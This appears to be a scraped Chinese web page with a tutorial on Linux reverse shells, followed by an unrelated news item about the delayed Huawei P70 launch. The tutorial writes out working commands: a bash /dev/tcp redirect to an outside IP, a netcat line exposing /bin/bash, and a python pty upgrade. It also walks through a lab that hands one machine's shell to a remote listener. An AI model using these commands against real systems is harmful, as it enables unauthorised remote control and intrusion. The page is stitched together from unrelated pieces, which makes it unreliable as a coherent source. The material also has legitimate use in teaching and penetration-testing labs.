完整命令
反弹shell命令:
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 bash -i > /dev/tcp/ip/port 0>&1 2>&1
利用nc反弹shell:
nc -lvvp 12345 -t -e /bin/bash
原理
bash -i > /dev/tcp/ip/port 0>&1 2>&1
bash -i 打开一个交互式的bash
&是为了区分文件1和文件描述符1的
a>&b 的意思是 a>b 2>&1
0代表输入 ,0>&1 意思是,将输出的窗口上所输入的值当作当前窗口的输入。反弹shell后会有两个窗口,即靶机的shell窗口跟攻击机的shell口。这命令的意思也可以理解为,将攻击机窗口的输入当作靶机窗口的输入最终输入给靶机。2代表标准错误输出。
实验
通过一个小实验帮助大家理解
第一步,将shell的正确输出重定向到外部主机
假设我们在kali上输入的命令为:
bash -i > /dev/tcp/192.168.124.1/9999
,这句话的意思是将交互式shell的标准输出重定向到192.168.124.1的9999端口。
在mac上监听端口命令为:nc -l 9999
首先在kali上输入whoami命令,发现没有回显,因为回显被重定向到了mac上。
但是当我们在kali上出入错误命令的时候,却存在回显。
第二步,将错误输出重定向到外部主机
我们只需要在上面的命令后面加上 2>&1即可,意思为将错误输出重定向到标准输出上,也就是重定向到我们的外部主机。
这时候发现在kali上按键盘已经没有任何回显了,回显全部出现在了mac的shell上:
这是因为我们已经将所有的输出都重定向到了外部主机上,但问题是现在我们的控制权还在kali上,mac无法进行任何输出操作,只能显示输出。这时候我们几句需要将输入的权限给予我们的mac。
第三步,交出输入权限
只需要在第二步命令的基础上加上 0>&1即可。
这时候已经可以在mac上完全控制kali的shell了,实验结束。
其他
当shell不稳定时候用python的虚拟化终端:
python -c "import pty;pty.spawn('/bin/bash')"
参考:
https://www.freebuf.com/news/142195.html #将shell转换成完全tty
https://blog.csdn.net/Auuuuuuuu/article/details/89059176
https://www.anquanke.com/post/id/87017
linux反弹shell
免责声明:本站文章均来自网站采集或用户投稿,网站不提供任何软件下载或自行开发的软件! 如有用户或公司发现本站内容信息存在侵权行为,请邮件告知! 858582#qq.com
P70系列延期,华为新旗舰将在下月发布
3月20日消息,近期博主@数码闲聊站 透露,原定三月份发布的华为新旗舰P70系列延期发布,预计4月份上市。
而博主@定焦数码 爆料,华为的P70系列在定位上已经超过了Mate60,成为了重要的旗舰系列之一。它肩负着重返影像领域顶尖的使命。那么这次P70会带来哪些令人惊艳的创新呢?
根据目前爆料的消息来看,华为P70系列将推出三个版本,其中P70和P70 Pro采用了三角形的摄像头模组设计,而P70 Art则采用了与上一代P60 Art相似的不规则形状设计。这样的外观是否好看见仁见智,但辨识度绝对拉满。